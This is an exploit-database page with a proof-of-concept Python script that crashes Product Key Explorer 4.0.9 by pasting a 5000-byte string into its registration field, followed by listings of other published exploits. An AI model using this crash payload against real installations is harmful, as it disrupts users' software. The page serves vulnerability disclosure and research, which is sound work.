Menu

Search for hundreds of thousands of exploits

"Product Key Explorer 4.0.9 - Denial of Service (PoC)"

Author

Exploit author

T3jv1l

Platform

Exploit platform

windows_x86

Release date

Exploit published date

2018-12-27

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
# Exploit Title: Product Key Explorer 4.0.9 - Denial of Service (PoC)
# Date: 2018-12-25
# Exploit Author: T3jv1l
# Vendor Homepage: :http://www.nsauditor.com
# Software: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
# Contact: https://twitter.com/T3jv1l
# Version:  Product Key Explorer 4.0.9
# Tested on: Windows 7 SP1 x86

# Other affected software from the vendor
# Software: http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
# Software: http://www.nsauditor.com/downloads/apkf_setup.exe
# Software: http://www.nsauditor.com/downloads/officeproductkeyfinder_setup.exe
# Software: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
# Software: http://www.nsauditor.com/downloads/spotmsn_setup.exe
# Software: http://www.nsauditor.com/downloads/spotie_setup.exe
# Software: http://www.nsauditor.com/downloads/spotftp_setup.exe
# Software: http://www.network-inventory-software.com/downloads/nhsi_setup.exe
# Software: http://www.nsauditor.com/downloads/nsi_setup.exe
# Software: http://www.nsauditor.com/downloads/blueauditor_setup.exe
# Software: http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Software: http://www.nsauditor.com/downloads/remshutdown_setup.exe
# Software: http://www.nsauditor.com/downloads/dnss_setup.exe

# PoC:
# 1.  Download and install the setup file
# 2.  A file "PoC.txt" will be created
# 3.  Click Help > Register... in tool bar
# 4.  Copy the contents of the file (PoC.txt) and paste in the Registration Key/Name field 
# 5.  Click OK and BOOMMMM !!!! 

#!/usr/bin/python

buffer = "\x41" * 2000
buffer += "\x42" * 2000
buffer += "\x43" * 1000

payload = buffer
try:
    f=open("PoC.txt","w")
    print "[+] Creating %s bytes payload..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
Release Date Title Type Platform Author
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
Release Date Title Type Platform Author
2019-11-19 "Microsoft Windows 7 (x86) - 'BlueKeep' Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free" remote windows_x86 0xeb-bp
2019-07-19 "MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)" remote windows_x86 sasaga92
2019-05-08 "Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)" remote windows_x86 Metasploit
2019-01-02 "Ayukov NFTP FTP Client 2.0 - Buffer Overflow" local windows_x86 "Uday Mittal"
2018-12-27 "Product Key Explorer 4.0.9 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "Iperius Backup 5.8.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "MAGIX Music Editor 3.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "ShareAlarmPro 2.1.4 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "NetShareWatcher 1.5.8 - Denial of Service (PoC)" dos windows_x86 T3jv1l
Release Date Title Type Platform Author
2020-04-17 "Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE" local windows T3jv1l
2019-01-22 "CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt" remote windows T3jv1l
2018-12-27 "Product Key Explorer 4.0.9 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "ShareAlarmPro 2.1.4 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "NetShareWatcher 1.5.8 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-09-11 "HTML5 Video Player 1.2.5 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-09-10 "Any Sound Recorder 2.93 - Denial of Service (PoC)" local windows_x86 T3jv1l
2018-09-07 "DVD Photo Slideshow Professional 8.07 - Buffer Overflow (SEH)" local windows T3jv1l
2018-04-26 "Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)" local windows T3jv1l
2018-04-24 "Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH)" local windows T3jv1l
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.